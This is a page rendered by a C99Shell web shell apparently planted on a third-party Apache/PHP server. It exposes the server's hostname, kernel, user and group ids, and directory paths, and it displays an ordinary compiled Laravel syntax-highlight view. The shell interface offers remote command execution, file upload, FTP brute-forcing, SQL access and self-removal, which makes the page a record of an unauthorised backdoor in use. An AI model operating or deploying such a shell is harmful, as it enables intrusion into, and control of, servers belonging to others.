!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/adflow-backend.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 25.85 GB of 117.98 GB (21.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     24c2de8b45c58ad3c495e27c42a1aa3d.php (3.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $attributes ??= new \Illuminate\View\ComponentAttributeBag;

$__newAttributes = [];
$__propNames \Illuminate\View\ComponentAttributeBag::extractPropNames(([
    
'code',
    
'language',
    
'editor' => false,
    
'startingLine' => 1,
    
'highlightedLine' => null,
    
'truncate' => false,
]));

foreach (
$attributes->all() as $__key => $__value) {
    if (
in_array($__key$__propNames)) {
        $
$__key = $$__key ?? $__value;
    } else {
        
$__newAttributes[$__key] = $__value;
    }
}

$attributes = new \Illuminate\View\ComponentAttributeBag($__newAttributes);

unset(
$__propNames);
unset(
$__newAttributes);

foreach (
array_filter(([
    
'code',
    
'language',
    
'editor' => false,
    
'startingLine' => 1,
    
'highlightedLine' => null,
    
'truncate' => false,
]), 
'is_string'ARRAY_FILTER_USE_KEY) as $__key => $__value) {
    $
$__key = $$__key ?? $__value;
}

$__defined_vars get_defined_vars();

foreach (
$attributes->all() as $__key => $__value) {
    if (
array_key_exists($__key$__defined_vars)) unset($$__key);
}

unset(
$__defined_vars$__key$__value); ?>

<?php
    $fallback 
$truncate '<pre class="truncate"><code>' '<pre><code>';

    if (
$editor) {
        
$lines explode("\n"$code);

        foreach (
$lines as $index => $line) {
            
$lineNumber $startingLine $index;
            
$highlight $highlightedLine === $index;
            
$lineClass implode(' ', [
                
'block px-4 py-1 h-7 even:bg-white odd:bg-white/2 even:dark:bg-white/2 odd:dark:bg-white/4',
                
$highlight 'bg-rose-200! dark:bg-rose-900!' '',
            ]);
            
$lineNumberClass implode(' ', [
                
'mr-6 text-neutral-500! dark:text-neutral-600!',
                
$highlight 'dark:text-white!' '',
            ]);

            
$fallback .= '<span class="' $lineClass '">';
            
$fallback .= '<span class="' $lineNumberClass '">' $lineNumber '</span>';
            
$fallback .= htmlspecialchars($line);
            
$fallback .= '</span>';
        }

    } else {
        
$fallback .= htmlspecialchars($code);
    }

    
$fallback .= '</code></pre>';
?>

<div
    x-data="{ highlightedCode: null }"
    x-init="
        highlightedCode = window.highlight(
            <?php echo e(Illuminate\Support\Js::from($code)); ?>,
            <?php echo e(Illuminate\Support\Js::from($language)); ?>,
            <?php echo e(Illuminate\Support\Js::from($truncate)); ?>,
            <?php echo e(Illuminate\Support\Js::from($editor)); ?>,
            <?php echo e(Illuminate\Support\Js::from($startingLine)); ?>,
            <?php echo e(Illuminate\Support\Js::from($highlightedLine)); ?>

        );
    "
    <?php echo e($attributes); ?>

>
    <div
        x-cloak
        x-html="highlightedCode"
    ></div>
    <div x-show="!highlightedCode"><?php echo $fallback?></div>
</div>
<?php /**PATH /home/picotech/domains/adflow.picotech.app/public_html/backend/vendor/laravel/framework/src/Illuminate/Foundation/Providers/../resources/exceptions/renderer/components/syntax-highlight.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--